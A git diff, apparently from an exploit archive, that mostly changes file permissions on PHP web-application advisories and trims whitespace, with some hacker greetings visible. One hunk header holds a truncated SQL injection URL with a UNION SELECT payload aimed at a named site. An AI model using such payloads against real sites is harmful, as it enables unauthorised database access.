a/platforms/php/webapps/9153.txt b/platforms/php/webapps/9153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9154.js b/platforms/php/webapps/9154.js old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9155.txt b/platforms/php/webapps/9155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9159.php b/platforms/php/webapps/9159.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9161.txt b/platforms/php/webapps/9161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9162.txt b/platforms/php/webapps/9162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9164.txt b/platforms/php/webapps/9164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9166.txt b/platforms/php/webapps/9166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9171.txt b/platforms/php/webapps/9171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9174.txt b/platforms/php/webapps/9174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9176.txt b/platforms/php/webapps/9176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9179.txt b/platforms/php/webapps/9179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9180.txt b/platforms/php/webapps/9180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9182.txt b/platforms/php/webapps/9182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9183.txt b/platforms/php/webapps/9183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9184.txt b/platforms/php/webapps/9184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9185.txt b/platforms/php/webapps/9185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9187.txt b/platforms/php/webapps/9187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9194.txt b/platforms/php/webapps/9194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9195.txt b/platforms/php/webapps/9195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9196.txt b/platforms/php/webapps/9196.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9202.txt b/platforms/php/webapps/9202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9203.txt b/platforms/php/webapps/9203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9204.txt b/platforms/php/webapps/9204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9205.txt b/platforms/php/webapps/9205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9211.txt b/platforms/php/webapps/9211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9217.txt b/platforms/php/webapps/9217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9219.txt b/platforms/php/webapps/9219.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9225.txt b/platforms/php/webapps/9225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9226.txt b/platforms/php/webapps/9226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9227.txt b/platforms/php/webapps/9227.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9231.txt b/platforms/php/webapps/9231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9235.php b/platforms/php/webapps/9235.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9236.txt b/platforms/php/webapps/9236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9237.txt b/platforms/php/webapps/9237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9238.txt b/platforms/php/webapps/9238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9239.txt b/platforms/php/webapps/9239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9243.txt b/platforms/php/webapps/9243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9244.txt b/platforms/php/webapps/9244.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9246.txt b/platforms/php/webapps/9246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9248.txt b/platforms/php/webapps/9248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9249.txt b/platforms/php/webapps/9249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9251.txt b/platforms/php/webapps/9251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9252.txt b/platforms/php/webapps/9252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9254.txt b/platforms/php/webapps/9254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9255.txt b/platforms/php/webapps/9255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9256.txt b/platforms/php/webapps/9256.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9257.php b/platforms/php/webapps/9257.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9258.txt b/platforms/php/webapps/9258.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9259.txt b/platforms/php/webapps/9259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9260.txt b/platforms/php/webapps/9260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9261.txt b/platforms/php/webapps/9261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9262.txt b/platforms/php/webapps/9262.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9263.txt b/platforms/php/webapps/9263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9266.txt b/platforms/php/webapps/9266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9267.txt b/platforms/php/webapps/9267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9269.txt b/platforms/php/webapps/9269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9270.txt b/platforms/php/webapps/9270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9271.txt b/platforms/php/webapps/9271.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9273.php b/platforms/php/webapps/9273.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9274.php b/platforms/php/webapps/9274.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9275.php b/platforms/php/webapps/9275.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9276.txt b/platforms/php/webapps/9276.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9281.txt b/platforms/php/webapps/9281.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9282.txt b/platforms/php/webapps/9282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9283.txt b/platforms/php/webapps/9283.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9284.txt b/platforms/php/webapps/9284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9287.txt b/platforms/php/webapps/9287.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9288.txt b/platforms/php/webapps/9288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9290.txt b/platforms/php/webapps/9290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9292.txt b/platforms/php/webapps/9292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9293.txt b/platforms/php/webapps/9293.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9294.txt b/platforms/php/webapps/9294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9296.txt b/platforms/php/webapps/9296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9297.txt b/platforms/php/webapps/9297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9307.txt b/platforms/php/webapps/9307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9308.txt b/platforms/php/webapps/9308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9309.txt b/platforms/php/webapps/9309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9310.txt b/platforms/php/webapps/9310.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9311.txt b/platforms/php/webapps/9311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9312.txt b/platforms/php/webapps/9312.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9313.txt b/platforms/php/webapps/9313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9314.txt b/platforms/php/webapps/9314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9316.txt b/platforms/php/webapps/9316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9320.php b/platforms/php/webapps/9320.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9322.txt b/platforms/php/webapps/9322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9324.txt b/platforms/php/webapps/9324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9325.txt b/platforms/php/webapps/9325.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9326.txt b/platforms/php/webapps/9326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9327.txt b/platforms/php/webapps/9327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9331.txt b/platforms/php/webapps/9331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9332.txt b/platforms/php/webapps/9332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9333.txt b/platforms/php/webapps/9333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9334.txt b/platforms/php/webapps/9334.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9335.txt b/platforms/php/webapps/9335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9336.txt b/platforms/php/webapps/9336.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9337.txt b/platforms/php/webapps/9337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9338.txt b/platforms/php/webapps/9338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9339.txt b/platforms/php/webapps/9339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9340.txt b/platforms/php/webapps/9340.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9341.txt b/platforms/php/webapps/9341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9342.txt b/platforms/php/webapps/9342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9344.txt b/platforms/php/webapps/9344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9347.txt b/platforms/php/webapps/9347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9348.txt b/platforms/php/webapps/9348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9349.txt b/platforms/php/webapps/9349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9350.txt b/platforms/php/webapps/9350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9351.txt b/platforms/php/webapps/9351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9353.txt b/platforms/php/webapps/9353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9355.txt b/platforms/php/webapps/9355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9356.txt b/platforms/php/webapps/9356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9358.txt b/platforms/php/webapps/9358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9365.txt b/platforms/php/webapps/9365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9367.txt b/platforms/php/webapps/9367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9369.txt b/platforms/php/webapps/9369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9370.txt b/platforms/php/webapps/9370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9371.txt b/platforms/php/webapps/9371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9372.txt b/platforms/php/webapps/9372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9378.txt b/platforms/php/webapps/9378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9380.txt b/platforms/php/webapps/9380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9383.txt b/platforms/php/webapps/9383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9384.txt b/platforms/php/webapps/9384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9385.txt b/platforms/php/webapps/9385.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9387.txt b/platforms/php/webapps/9387.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9389.txt b/platforms/php/webapps/9389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9390.txt b/platforms/php/webapps/9390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9395.txt b/platforms/php/webapps/9395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9396.txt b/platforms/php/webapps/9396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9397.txt b/platforms/php/webapps/9397.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9398.php b/platforms/php/webapps/9398.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9399.txt b/platforms/php/webapps/9399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9400.txt b/platforms/php/webapps/9400.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9404.txt b/platforms/php/webapps/9404.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9405.txt b/platforms/php/webapps/9405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9406.txt b/platforms/php/webapps/9406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9407.txt b/platforms/php/webapps/9407.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9408.php b/platforms/php/webapps/9408.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9410.txt b/platforms/php/webapps/9410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9413.txt b/platforms/php/webapps/9413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9416.txt b/platforms/php/webapps/9416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9419.txt b/platforms/php/webapps/9419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9421.txt b/platforms/php/webapps/9421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9424.txt b/platforms/php/webapps/9424.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9431.txt b/platforms/php/webapps/9431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9433.txt b/platforms/php/webapps/9433.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9434.txt b/platforms/php/webapps/9434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9437.txt b/platforms/php/webapps/9437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9438.txt b/platforms/php/webapps/9438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9440.txt b/platforms/php/webapps/9440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9441.txt b/platforms/php/webapps/9441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9444.txt b/platforms/php/webapps/9444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9450.txt b/platforms/php/webapps/9450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9451.txt b/platforms/php/webapps/9451.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9453.txt b/platforms/php/webapps/9453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9459.txt b/platforms/php/webapps/9459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9460.txt b/platforms/php/webapps/9460.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9461.txt b/platforms/php/webapps/9461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9462.txt b/platforms/php/webapps/9462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9463.php b/platforms/php/webapps/9463.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9464.txt b/platforms/php/webapps/9464.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9465.txt b/platforms/php/webapps/9465.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9469.txt b/platforms/php/webapps/9469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9470.txt b/platforms/php/webapps/9470.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9471.txt b/platforms/php/webapps/9471.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9472.txt b/platforms/php/webapps/9472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9475.txt b/platforms/php/webapps/9475.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9481.txt b/platforms/php/webapps/9481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9482.txt b/platforms/php/webapps/9482.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9484.txt b/platforms/php/webapps/9484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9485.txt b/platforms/php/webapps/9485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9490.txt b/platforms/php/webapps/9490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9491.txt b/platforms/php/webapps/9491.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9493.txt b/platforms/php/webapps/9493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9494.txt b/platforms/php/webapps/9494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9499.txt b/platforms/php/webapps/9499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9502.txt b/platforms/php/webapps/9502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9504.txt b/platforms/php/webapps/9504.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9505.txt b/platforms/php/webapps/9505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9510.txt b/platforms/php/webapps/9510.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9511.txt b/platforms/php/webapps/9511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9512.txt b/platforms/php/webapps/9512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9518.txt b/platforms/php/webapps/9518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9522.txt b/platforms/php/webapps/9522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9523.txt b/platforms/php/webapps/9523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9524.txt b/platforms/php/webapps/9524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9525.txt b/platforms/php/webapps/9525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9527.txt b/platforms/php/webapps/9527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9529.txt b/platforms/php/webapps/9529.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9530.txt b/platforms/php/webapps/9530.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9531.txt b/platforms/php/webapps/9531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9532.txt b/platforms/php/webapps/9532.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9533.txt b/platforms/php/webapps/9533.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9534.txt b/platforms/php/webapps/9534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9535.txt b/platforms/php/webapps/9535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9538.txt b/platforms/php/webapps/9538.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9544.txt b/platforms/php/webapps/9544.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9552.txt b/platforms/php/webapps/9552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9553.txt b/platforms/php/webapps/9553.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9555.txt b/platforms/php/webapps/9555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9556.php b/platforms/php/webapps/9556.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9563.txt b/platforms/php/webapps/9563.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9564.txt b/platforms/php/webapps/9564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9565.txt b/platforms/php/webapps/9565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9566.txt b/platforms/php/webapps/9566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9569.txt b/platforms/php/webapps/9569.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9570.txt b/platforms/php/webapps/9570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9571.txt b/platforms/php/webapps/9571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9572.txt b/platforms/php/webapps/9572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9576.txt b/platforms/php/webapps/9576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9577.txt b/platforms/php/webapps/9577.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9578.txt b/platforms/php/webapps/9578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9582.txt b/platforms/php/webapps/9582.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9583.txt b/platforms/php/webapps/9583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9588.txt b/platforms/php/webapps/9588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9590.c b/platforms/php/webapps/9590.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9591.txt b/platforms/php/webapps/9591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9593.txt b/platforms/php/webapps/9593.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9599.txt b/platforms/php/webapps/9599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9600.txt b/platforms/php/webapps/9600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9601.php b/platforms/php/webapps/9601.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9603.txt b/platforms/php/webapps/9603.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9604.txt b/platforms/php/webapps/9604.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9609.txt b/platforms/php/webapps/9609.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9611.txt b/platforms/php/webapps/9611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9623.txt b/platforms/php/webapps/9623.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9625.txt b/platforms/php/webapps/9625.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9629.txt b/platforms/php/webapps/9629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9630.txt b/platforms/php/webapps/9630.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9631.txt b/platforms/php/webapps/9631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9632.txt b/platforms/php/webapps/9632.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9633.txt b/platforms/php/webapps/9633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9634.txt b/platforms/php/webapps/9634.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9635.txt b/platforms/php/webapps/9635.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9636.txt b/platforms/php/webapps/9636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9637.txt b/platforms/php/webapps/9637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9639.txt b/platforms/php/webapps/9639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9640.txt b/platforms/php/webapps/9640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9647.txt b/platforms/php/webapps/9647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9648.txt b/platforms/php/webapps/9648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9653.txt b/platforms/php/webapps/9653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9654.php b/platforms/php/webapps/9654.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9656.txt b/platforms/php/webapps/9656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9669.txt b/platforms/php/webapps/9669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9674.txt b/platforms/php/webapps/9674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9681.txt b/platforms/php/webapps/9681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9692.txt b/platforms/php/webapps/9692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9693.txt b/platforms/php/webapps/9693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9696.txt b/platforms/php/webapps/9696.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9697.txt b/platforms/php/webapps/9697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9699.txt b/platforms/php/webapps/9699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9702.txt b/platforms/php/webapps/9702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9703.txt b/platforms/php/webapps/9703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9706.txt b/platforms/php/webapps/9706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9708.txt b/platforms/php/webapps/9708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9710.txt b/platforms/php/webapps/9710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9711.txt b/platforms/php/webapps/9711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9712.txt b/platforms/php/webapps/9712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9801.txt b/platforms/php/webapps/9801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9812.txt b/platforms/php/webapps/9812.txt old mode 100755 new mode 100644 index 762ce97e0..229d6f3f1 --- a/platforms/php/webapps/9812.txt +++ b/platforms/php/webapps/9812.txt @@ -53,4 +53,4 @@ http://ithinkbiz.com/index.php?option=com_icrmbasic&p1=m6&p3=-10+union+select+1, [+] makasih buad babe and enyak .... muach .. [+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha -[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^ \ No newline at end of file +[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^ \ No newline at end of file diff --git a/platforms/php/webapps/9818.txt b/platforms/php/webapps/9818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/982.c b/platforms/php/webapps/982.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9820.txt b/platforms/php/webapps/9820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9821.txt b/platforms/php/webapps/9821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9822.txt b/platforms/php/webapps/9822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9824.txt b/platforms/php/webapps/9824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9825.txt b/platforms/php/webapps/9825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9826.txt b/platforms/php/webapps/9826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9828.txt b/platforms/php/webapps/9828.txt old mode 100755 new mode 100644 index 03dcdbaac..202d96754 --- a/platforms/php/webapps/9828.txt +++ b/platforms/php/webapps/9828.txt @@ -152,4 +152,4 @@ Digital Security is one of the leading IT security companies in CEMEA, providing Contact: research [at] dsecrg [dot] com -http://www.dsecrg.com \ No newline at end of file +http://www.dsecrg.com \ No newline at end of file diff --git a/platforms/php/webapps/9830.txt b/platforms/php/webapps/9830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9832.txt b/platforms/php/webapps/9832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9833.txt b/platforms/php/webapps/9833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9835.txt b/platforms/php/webapps/9835.txt old mode 100755 new mode 100644 index 42a90a43f..b522d540e --- a/platforms/php/webapps/9835.txt +++ b/platforms/php/webapps/9835.txt @@ -27,7 +27,4 @@ #=========================================================== ################################################################# # Securitylab Security Research Team -################################################################### - - - \ No newline at end of file +################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/9836.txt b/platforms/php/webapps/9836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9837.txt b/platforms/php/webapps/9837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/9839.txt b/platforms/php/webapps/9839.txt old mode 100755 new mode 100644 index 2bb2c197d..984795350 --- a/platforms/php/webapps/9839.txt +++ b/platforms/php/webapps/9839.txt @@ -18,5 +18,4 @@ thenqyu : IndonesianCoder.SurabayaHackerLink.ServerIsDown.Kill-9 Don Tukulesto.KaMtiEz.Vyc0d.Arianom.Denbayan.mistersaint gonzhack.cyb3r_tr0n.m364tr0n. 